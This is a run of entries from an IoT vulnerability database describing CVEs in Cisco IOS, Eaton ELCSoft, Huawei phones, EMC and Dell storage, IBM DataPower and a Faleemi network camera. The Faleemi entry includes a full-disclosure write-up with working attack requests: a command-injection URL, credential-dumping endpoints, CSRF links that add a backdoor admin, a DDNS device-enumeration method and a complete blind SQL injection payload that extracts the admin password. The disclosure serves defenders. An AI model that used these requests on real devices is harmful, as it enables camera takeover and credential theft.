VARIoT IoT vulnerabilities database


VAR-201709-0705 CVE-2017-12233 Cisco IOS Input validation vulnerability
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Multiple vulnerabilities in the implementation of the Common Industrial Protocol (CIP) feature in Cisco IOS 12.4 through 15.6 could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of crafted CIP packets destined to an affected device. An attacker could exploit these vulnerabilities by sending crafted CIP packets to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Cisco Bug IDs: CSCuz95334. Cisco IOS contains an input validation vulnerability. The vendor has confirmed this vulnerability and published it as Bug ID CSCuz95334. An affected device may be put into a service interruption (DoS) state. Cisco IOS is an operating system developed by Cisco Systems for its network devices.
VAR-201709-0706 CVE-2017-12234 Cisco IOS Input validation vulnerability
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
Multiple vulnerabilities in the implementation of the Common Industrial Protocol (CIP) feature in Cisco IOS 12.4 through 15.6 could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of crafted CIP packets destined to an affected device. An attacker could exploit these vulnerabilities by sending crafted CIP packets to be processed by an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. Cisco Bug IDs: CSCvc43709. Cisco IOS contains an input validation vulnerability. The vendor has confirmed this vulnerability and published it as Bug ID CSCvc43709. An affected device may be put into a service interruption (DoS) state. Cisco IOS is an operating system developed by Cisco Systems for its network devices.
VAR-201709-0707 CVE-2017-12235 Cisco IOS Input validation vulnerability
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A vulnerability in the implementation of the PROFINET Discovery and Configuration Protocol (PN-DCP) for Cisco IOS 12.2 through 15.6 could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to the improper parsing of ingress PN-DCP Identify Request packets destined to an affected device. An attacker could exploit this vulnerability by sending a crafted PN-DCP Identify Request packet to an affected device and then continuing to send normal PN-DCP Identify Request packets to the device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. This vulnerability affects Cisco devices that are configured to process PROFINET messages. Beginning with Cisco IOS Software Release 12.2(52)SE, PROFINET is enabled by default on all the base switch module and expansion-unit Ethernet ports. Cisco Bug IDs: CSCuz47179. Cisco IOS contains an input validation vulnerability. The vendor has confirmed this vulnerability and published it as Bug ID CSCuz47179. An affected device may be put into a service interruption (DoS) state. Cisco IOS is an operating system developed by Cisco Systems for its network devices.
VAR-201709-0708 CVE-2017-12236 Cisco IOS XE Authentication vulnerability
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the implementation of the Locator/ID Separation Protocol (LISP) in Cisco IOS XE 3.2 through 16.5 could allow an unauthenticated, remote attacker using an x tunnel router to bypass authentication checks performed when registering an Endpoint Identifier (EID) to a Routing Locator (RLOC) in the map server/map resolver (MS/MR). The vulnerability is due to a logic error introduced via a code regression for the affected software. An attacker could exploit this vulnerability by sending specific valid map-registration requests, which will be accepted by the MS/MR even if the authentication keys do not match, to the affected software. A successful exploit could allow the attacker to inject invalid mappings of EIDs to RLOCs in the MS/MR of the affected software. This vulnerability affects Cisco devices that are configured with LISP acting as an IPv4 or IPv6 map server. This vulnerability affects Cisco IOS XE Software release trains 3.9E and Everest 16.4. Cisco Bug IDs: CSCvc18008. The vendor has confirmed this vulnerability and published it as Bug ID CSCvc18008. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Cisco IOS XE is an operating system developed by Cisco Systems for its network devices. This may lead to further attacks.
VAR-201709-0694 CVE-2017-12237 Cisco IOS and IOS XE Resource management vulnerability
CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS 15.0 through 15.6 and Cisco IOS XE 3.5 through 16.5 could allow an unauthenticated, remote attacker to cause high CPU utilization, traceback messages, or a reload of an affected device that leads to a denial of service (DoS) condition. The vulnerability is due to how an affected device processes certain IKEv2 packets. An attacker could exploit this vulnerability by sending specific IKEv2 packets to an affected device to be processed. A successful exploit could allow the attacker to cause high CPU utilization, traceback messages, or a reload of the affected device that leads to a DoS condition. This vulnerability affects Cisco devices that have the Internet Security Association and Key Management Protocol (ISAKMP) enabled. Although only IKEv2 packets can be used to trigger this vulnerability, devices that are running Cisco IOS Software or Cisco IOS XE Software are vulnerable when ISAKMP is enabled. A device does not need to be configured with any IKEv2-specific features to be vulnerable. Many features use IKEv2, including different types of VPNs such as the following: LAN-to-LAN VPN; Remote-access VPN, excluding SSL VPN; Dynamic Multipoint VPN (DMVPN); and FlexVPN. Cisco Bug IDs: CSCvc41277. The vendor has confirmed this vulnerability and published it as Bug ID CSCvc41277. An affected device may be put into a service interruption (DoS) state. The Internet Key Exchange Version 2 (IKEv2) module is one of the key exchange protocol modules.
VAR-201709-1296 No CVE (0Day) Eaton ELCSoft LAD File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of a LAD file. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
VAR-201709-1297 No CVE (0Day) Eaton ELCSoft SFC File Parsing Out-Of-Bounds Access Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of an SFC file. The process does not properly validate user-supplied data, which can result in memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
VAR-201709-1291 No CVE (0Day) Eaton ELCSoft SegCmt Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of a SegCmt record in an EPC file. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
VAR-201709-1294 No CVE (0Day) Eaton ELCSoft Device Comment Range Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of a Device Comment Range record in an EPC file. The issue results from the lack of proper validation of user-supplied data, which can result in a write to an arbitrary address. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
VAR-201709-1295 No CVE (0Day) Eaton ELCSoft DEV File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of a DEV file. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
VAR-201709-1293 No CVE (0Day) Eaton ELCSoft EPC File Parsing Out-Of-Bounds Access Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of an EPC file. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
VAR-201709-1292 No CVE (0Day) Eaton ELCSoft EPC File Parsing Out-Of-Bounds Access Remote Code Execution Vulnerability
CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Eaton ELCSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of an EPC file. The process does not properly validate user-supplied data, which can result in memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
VAR-201709-0746 CVE-2017-14743 Faleemi FSC-880 SQL Injection Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201709-0049
CVSS V2: 9.3
CVSS V3: 8.1
Severity: HIGH
Faleemi FSC-880 00.01.01.0048P2 devices allow unauthenticated SQL injection via the Username element in an XML document to /onvif/device_service, as demonstrated by reading the admin password. Faleemi FSC-880 contains a SQL injection vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Faleemi FSC-880 is a network camera product from Faleemi, USA. A SQL injection vulnerability exists in the Faleemi FSC-880 00.01.01.0048P2 release. This vulnerability can be exploited by a remote attacker to read the administrator password.

Full disclosure is here: https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce

=== Timeline:
25 August 2017: the research was made
29 August 2017: an email was sent to the vendor, but with no answer
25 September 2017: public disclosure
26 September 2017: assigned CVE-2017-14743

https://www.faleemi.com/product/fsc880-1080p-wirelee-ip-camera/
Firmware: 00.01.01.0048P2 (2017-07-27)

This camera has multiple security vulnerabilities, which can be exploited both locally and remotely. In particular, hardwired manufacturer DDNS and port-mapping to the camera via a upnp compatible router. Allowing for the discovered avoidance of authentication and RCE, this camera is an ideal candidate for another botnet such as Mirai.

CVE-2017-14743

Vulnerabilities

RCE
Works in stock firmware 00.01.01.0046 (E2017-03-**). In the latest firmware (00.01.01.0048P2 (2017-07-27)) this is fixed: the ftp client is removed. It is not in the processes and not in the file system, ostensibly because the realization was altered.
Remote code execution in the admin panel in the GET parameters of the Ft server scenario:
http://IP/hy-cgi/ftp.cgi?cmd=setftpattr&ft_server=;RCE;&ftp_port==25&ft_username=&ft_password=&ft_dirname=

RCE2 (LAN)
During analysis and reversing of the firmware we found an undocumented function: it is possible to quite simply turn on telnet on the device.
Turn on telnet on port 23: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=settelnetstatus&enable=1
Check status: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=gettelnetstatus
Password protected Telnet: same as on the web panel but with one exception: telnet is not connected to upnp. This suggests that the port is not accessible outside the LAN. We have so far been unable to connect it because we have not found custom settings for doing so via upnp.
enable upnp: http://192.168.0.100/hy-cgi/net.cgi?cmd=setupnpattr&upnp_enable=1
upnp status: http://192.168.0.100/hy-cgi/net.cgi?cmd=getupnpattr&cmd=getupnpmap&cmd=getupnptmstatus

Plaintext passwords
User passwords are stored on the device in plaintext format in several locations simultaneously:
/etc/webserver/lighttpd.user
/mnt/mtd/db/ipcsys.db
Passwords are synchronised when changed.
Information Disclosure
Prior to 00.01.01.0048P2 (2017-07-27): 0DAY
Device Info: http://192.168.0.100/hy-cgi/device.cgi?cmd=getdeviceinfo
WIFI credentials leak: http://192.168.0.100/hy-cgi/wifi.cgi?cmd=getwifiattr
Current user credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=checkuserinfo
All users credentials leak: http://192.168.0.100/hy-cgi/user.cgi?cmd=getuserattr
Third Party DDNS credentials leak: http://192.168.0.100/hy-cgi/ddns.cgi?cmd=get3thddnsattr
Manufacturer's DDNS credentials leak: http://192.168.0.100/hy-cgi/factory_param.cgi?cmd=getddns
SMTP settings and credentials leak: http://192.168.0.100/hy-cgi/smtp.cgi?cmd=getsmtpattr
FTP settings and credentials leak: http://192.168.0.100/hy-cgi/ftp.cgi?cmd=getftpattr

CSRF
Prior to 00.01.01.0048P2 (2017-07-27): 0DAY
http://192.168.8.102/hy-cgi/device.cgi?cmd=sysreboot
http://192.168.0.100/hy-cgi/log.cgi?cmd=deloperlog
http://192.168.0.100/hy-cgi/log.cgi?cmd=cleanlog
http://192.168.0.100/hy-cgi/user.cgi?cmd=adduser&at_username=BACKDOOR_ADMIN&at_password=BACKDOOR_PASSWORD&at_rolename=admin
All changes in camera settings go through GET commands and don't use CSRF tokens. The following functions can be executed remotely: Configure Camera, Format SD card, Delete Logs, Steal image from camera. These actions and commands can be executed from the admin's browser. The indecent hacker only needs to lure the admin to their page. Similar attacks on routers have been registered in the past: http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html

And some more epic stuff

Manufacturer's DDNS enumeration
There are hardwired manufacturer DDNS settings found in the device. The device sends an http request using udp to www.nwsvr1.com, and sends its internal address and admin web panel IP address to the API http://www.nwsvr1.com/api/userip.asp. The device we researched has the DDNS name 009lfld.nwsvr1.com.
Knowing that device names are generated automatically, it is possible to enumerate the entire range of names using the mask 00\d[a-z]{4}.nwsvr1.com and obtain a full list of devices in the network. We found a total of 758000 devices, which connected with this DDNS at least once in the past. These are cameras by different manufacturers, which are somehow related to each other. Around 3% of devices are in the network.

HK 18.41%, US 12.72%, DE 9.94%, ES 6.77%, FR 5.66%, AR 5.09%, GB 5.00%, DK 3.79%, IT 3.34%, PL 3.04%, MX 1.90%, CN 1.55%, VN 1.53%, JP 1.53%, HU 1.40%, CL 1.27%, BR 1.20%, TH 1.19%

A little over 20% of all devices use a default password. Virtually all devices are accessible by ONVIF. A similar number (20-25 thousand devices are online) are vulnerable to auth bypass via sqli. We have serious concerns that the DDNS password, which is hardwired into the device by the manufacturer, is incremental. This means that it is possible to reverse-calculate the password to the camera based on its DDNS name. This raises the risk of the password being hijacked if the IP cards are switched on the DDNS server, then the admin is redirected using a camera with a DDNS name and the password is grabbed using the attacker's own authentication form.

Authorization bypass via blind SQLi
Prior to 00.01.01.0048P2 (2017-07-27): 0DAY
A device without authentication on the web port has an accessible endpoint by default: /onvif/. ONVIF is an API standard for such devices. The WSDL can be downloaded from the official website (www.onvif.org). The API uses authentication by tokens. Using this it is possible to obtain an admin password.
Example of the exploit:
/* https://medium.com/iotsploit/faleemi-fsc-880-multiple-security-vulnerabilities-ed1d132c2cce */
POST /onvif/device_service HTTP/1.1
Content-Type: application/soap+xml
Content-Length: 1076
charset: utf-8
Host: 192.168.0.100
Connection: close

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://www.w3.org/2005/08/addressing">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>adfgadfhart' AND 1=2 UNION SELECT 1,'admin',(select unicode(substr(C_PassWord, 2, 1)) from t_user limit 1 OFFSET 0),'remark'/*</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">UHZjybNG8udkMEflf+LjkCUmR88=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">fDnW+mqvvsID/WJGNR6QWQ==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-01T00:03:58.674Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/>
</s:Body>
</s:Envelope>

To do this, the date and time set in the device are needed because they are used to build the password field of the authentication token. We drafted this POC, which allows one to extract a password from the camera and gain entry to the device using admin credentials.

This research was made by IoTSploit Team. Feel free to contact us at oleg@iotsploit.co and visit our website at https://iotsploit.co/ If you have any active contact with Faleemi, please, show them this report and we are ready to coop
VAR-201709-1248 No CVE Huawei Y6 Pro AEE extension module information leakage vulnerability
CVSS V2: 4.9
CVSS V3: -
Severity: MEDIUM
Huawei Y6 Pro is a smartphone from China's Huawei company. An information disclosure vulnerability exists in the Huawei Y6 Pro mobile phone using the AEE extension module of the MTK platform. Because a particular process is incorrectly authorized, an attacker could convince a user to install a malicious application, which can then use that process to obtain user information.
VAR-201711-0052 CVE-2017-14375 Multiple EMC products: vulnerabilities related to authorization, authority, and access control
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
EMC Unisphere for VMAX Virtual Appliance (vApp) versions prior to 8.4.0.15, EMC Solutions Enabler Virtual Appliance versions prior to 8.4.0.15, EMC VASA Virtual Appliance versions prior to 8.4.0.512, and EMC VMAX Embedded Management (eManagement) versions prior to and including 1.4 (Enginuity Release 5977.1125.1125 and earlier) contain an authentication bypass vulnerability that may potentially be exploited by malicious users to compromise the affected system. Multiple EMC products contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of EMC Unisphere For VMAX vApp Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ORBServlet. The vulnerability is caused by improper access controls that allow the creation of admin credentials. An attacker can leverage this vulnerability to disclose sensitive information under the context of the web application. Multiple EMC Products are prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks. Details: The vApp Manager contains a servlet that does not perform proper authentication checks before processing AMF messages for user creation requests. A remote unauthenticated attacker, by having knowledge of the message format, may potentially create new user accounts with administrative privileges, and then log in to the affected application.
Link to remedies: Customers can download software for EMC Unisphere for VMAX Virtual Appliance 8.4.0.15 OVA and ISO from EMC Online Support at https://support.emc.com/downloads/27045_Unisphere-for-VMAX Customers are recommended to contact Customer Support and place a Customer Service Request for all other fixes. Credit: EMC would like to thank rgod working with Trend Micro's Zero Day Initiative, for reporting this issue.
VAR-201711-1029 CVE-2017-8214 Multiple Huawei smartphone software: vulnerabilities related to authorization, authority, and access control
CVSS V2: 7.2
CVSS V3: 6.2
Severity: MEDIUM
Honor 8, Honor V8, Honor 9, Honor V9, Nova 2, Nova 2 Plus, P9, P10 Plus, Toronto Huawei smart phones with software of versions earlier than FRD-AL00C00B391, versions earlier than FRD-DL00C00B391, versions earlier than KNT-AL10C00B391, versions earlier than KNT-AL20C00B391, versions earlier than KNT-UL10C00B391, versions earlier than KNT-TL10C00B391, versions earlier than Stanford-AL00C00B175, versions earlier than Stanford-AL10C00B175, versions earlier than Stanford-TL00C01B175, versions earlier than Duke-AL20C00B191, versions earlier than Duke-TL30C01B191, versions earlier than Picasso-AL00C00B162, versions earlier than Picasso-TL00C01B162, versions earlier than Barca-AL00C00B162, versions earlier than Barca-TL00C00B162, versions earlier than EVA-AL10C00B396SP03, versions earlier than EVA-CL00C92B396, versions earlier than EVA-DL00C17B396, versions earlier than EVA-TL00C01B396, versions earlier than Vicky-AL00AC00B172, versions earlier than Toronto-AL00AC00B191, versions earlier than Toronto-TL10C01B191 have an unlock code verification bypassing vulnerability. An attacker with the root privilege of a mobile can exploit this vulnerability to bypass the unlock code verification and unlock the mobile phone bootloader. Multiple Huawei smartphone software releases contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Glory 8, Glory V8, Glory 9, Glory V9, Enjoy 7Plus, P9, P10Plus, Nova2 and Nova2Plus are all Huawei smartphones from China. The Huawei Honor 8 and others are smartphone products of the Chinese company Huawei. Several Huawei products have security vulnerabilities.
VAR-201711-1030 CVE-2017-8215 Multiple Huawei smartphone software: vulnerabilities related to authorization, authority, and access control
CVSS V2: 7.2
CVSS V3: 6.2
Severity: MEDIUM
Honor 8, Honor V8, Honor 9, Honor V9, Nova 2, Nova 2 Plus, P9, P10 Plus, Toronto Huawei smart phones with software of versions earlier than FRD-AL00C00B391, versions earlier than FRD-DL00C00B391, versions earlier than KNT-AL10C00B391, versions earlier than KNT-AL20C00B391, versions earlier than KNT-UL10C00B391, versions earlier than KNT-TL10C00B391, versions earlier than Stanford-AL00C00B175, versions earlier than Stanford-AL10C00B175, versions earlier than Stanford-TL00C01B175, versions earlier than Duke-AL20C00B191, versions earlier than Duke-TL30C01B191, versions earlier than Picasso-AL00C00B162, versions earlier than Picasso-TL00C01B162, versions earlier than Barca-AL00C00B162, versions earlier than Barca-TL00C00B162, versions earlier than EVA-AL10C00B396SP03, versions earlier than EVA-CL00C92B396, versions earlier than EVA-DL00C17B396, versions earlier than EVA-TL00C01B396, versions earlier than Vicky-AL00AC00B172, versions earlier than Toronto-AL00AC00B191, versions earlier than Toronto-TL10C01B191 have a permission control vulnerability. An attacker with the system privilege of a mobile can exploit this vulnerability to bypass the unlock code verification and unlock the mobile phone bootloader. Multiple Huawei smartphone software releases contain vulnerabilities related to authorization, permissions, and access control. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Glory 8, Glory V8, Glory 9, Glory V9, Enjoy 7Plus, P9, P10Plus, Nova2 and Nova2Plus are all Huawei smartphones from China. There are permission control vulnerabilities in various Huawei phones. The Huawei Honor 8 and others are smartphone products of the Chinese company Huawei. Several Huawei products have security vulnerabilities.
VAR-201712-0081 CVE-2017-14374 Dell Storage Manager Vulnerabilities related to the use of hard-coded credentials
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
The SMI-S service in Dell Storage Manager versions earlier than 16.3.20 (aka 2016 R3.20) is protected using a hard-coded password. A remote user with knowledge of the password might potentially disable the SMI-S service via HTTP requests, affecting storage management and monitoring functionality via the SMI-S interface. This issue, aka DSM-30415, only affects a Windows installation of the Data Collector (not applicable to the virtual appliance). Dell Storage Manager is an application for managing and monitoring multiple Storage Centers and PS series FluidFS from Dell. An attacker can exploit this vulnerability by sending HTTP requests to disable the SMI-S service.
VAR-201710-1306 CVE-2017-8021 EMC Elastic Cloud Storage Vulnerabilities related to certificate and password management
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
EMC Elastic Cloud Storage (ECS) before 3.1 is affected by an undocumented account vulnerability that could potentially be leveraged by malicious users to compromise the affected system. Remote attackers with knowledge of the default credentials may exploit this vulnerability to gain unauthorized access and perform unauthorized actions. This may aid in further attacks. Versions prior to EMC Elastic Cloud Storage 3.1 are vulnerable. A remote attacker could exploit this vulnerability to take control of an affected system. Details: ECS versions prior to 3.1 contain an undocumented account (emcservice) that is protected with a default password. This user account is intended for use by customer support representatives to troubleshoot ECS configuration issues. Resolution: Information about this account has been added to the ECS 3.1 Security Configuration Guide. EMC recommends that all customers change the default password at the earliest opportunity. Link to Remedy: Customers are requested to contact Customer Support to help change the default password for this account.
VAR-201709-0612 CVE-2017-1591 IBM WebSphere DataPower Appliances cross-site scripting vulnerability
CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
IBM WebSphere DataPower Appliances 7.0.0 through 7.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132368. The vendor has confirmed this vulnerability and published it as IBM X-Force ID: 132368. Information may be obtained and information may be altered. IBM WebSphere DataPower Appliances is a set of network equipment from IBM Corporation of the United States. The device is designed to simplify, secure, and accelerate the deployment of XML and Web services in SOA. A remote attacker could exploit this vulnerability to inject arbitrary JavaScript code into the Web UI. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.